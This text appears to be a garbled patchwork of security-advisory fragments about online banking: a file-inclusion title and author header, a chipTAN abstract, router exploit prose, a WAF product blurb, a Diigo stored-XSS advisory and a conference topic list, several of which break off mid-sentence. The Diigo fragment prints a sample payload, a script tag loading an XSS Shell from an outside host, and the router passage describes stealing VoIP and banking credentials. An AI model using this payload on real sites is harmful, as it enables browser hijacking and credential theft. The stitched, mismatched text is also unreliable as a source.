Title:
======
eBank IT Online Banking - Multiple Web Vulnerabilities
Date:
=====
2012-01-26
#########################################################################
W2B Online Banking Remote File Inclusion Vulnerability
#########################################################################
## AUTHOR: THuM4N
## Email : Win32.exe@w.cn
## Script : W2B Online Banking
Abstract
========
ChipTAN comfort is a new system which is supposed to securely authorise online
banking transactions by means of a trusted device. It is assumed that chipTAN
comfort specifically protects against man-in-the-middle attacks. Such attacks are
currently putting bank customers who are using the iTAN system at risk. RedTeam
Pentesting examined chipTAN comfort and showed that even when using this sys-
tem, man-in-the-middle attacks can compromise online banking security.
router's page. This means evilness of the exploits are only limited by
the attacker's imagination. Other examples of evil attacks include
evesdropping VoIP conversations (change 'sip config primproxyaddr'
statement in config file), stealing VoIP credentials, exposing
internal hosts on the DMZ, change the DNS settings for stealing online
banking credentials, disable auto updates (change 'cwmp.ini' section
in config file), etc …
The only requirement for the router to be owned is that a victim user
visits a (malicious) website. The good news is that our exploits do
NOT require knowledge of the admin password! How can that be? Well, we
Product Description
---------------------------------------
phion's web application firewall (WAF) airlock provides a unique
combination of protective mechanisms for web applications. Whether you
want to observe PCI DSS, safeguard online banking or protect e-commerce
applications: airlock ensures sustained and manageable web application
security.
[Source:
http://www.phion.com/INT/products/websecurity/Pages/default.aspx]
Target URL can be over SSL as well. All Diigo tools users are affected
from this vulnerability.
For an attacker this is a perfect opportunity to use some XSS bot
manager application such as XSS Shell, Also an attacker can attack
high profile websites such as online banking applications. Considering
you can search in shared bookmarks so you can actually people who uses
a certain online banking application.
Sample attack comment can be:
<script src="http://example.com/xssshell/"></script>
> certificate (at least the CN which yells the difference) then he
> probably asked for it.
The Web is used by close to a billion people who do not necessarily check
the details of SSL certs, or inspect all HTTP headers, on *every single*
login to their webmail or online banking site.
We may perhaps blame them if they click through clear and concise security
warnings, or subvert other measures, and willingly consent to an
unnecessary risk - but when they rely on the expertise of browser vendors
to know that something is wrong, and get burned - well, it's not their
https://deepsec.net/schedule/
The topics include social engineering, security of the GSM air interface,
design of secure protocols, physical security, Web 2.0, exploit/malware
analysis & design, security awareness, abusing device drivers, #twitter
risks, attacks on smart-card secured online banking, security risks and
defence for developers, advanced database exploits, abusing firmware,
security analysis of the TCP & IP protocols, key management, incident
response, e-voting, advanced keyboard sniffing, malware for routers,
large-scale network attack simulation, cloud computing, next generation
intrusion detection/prevention, among others. We also show a demonstration
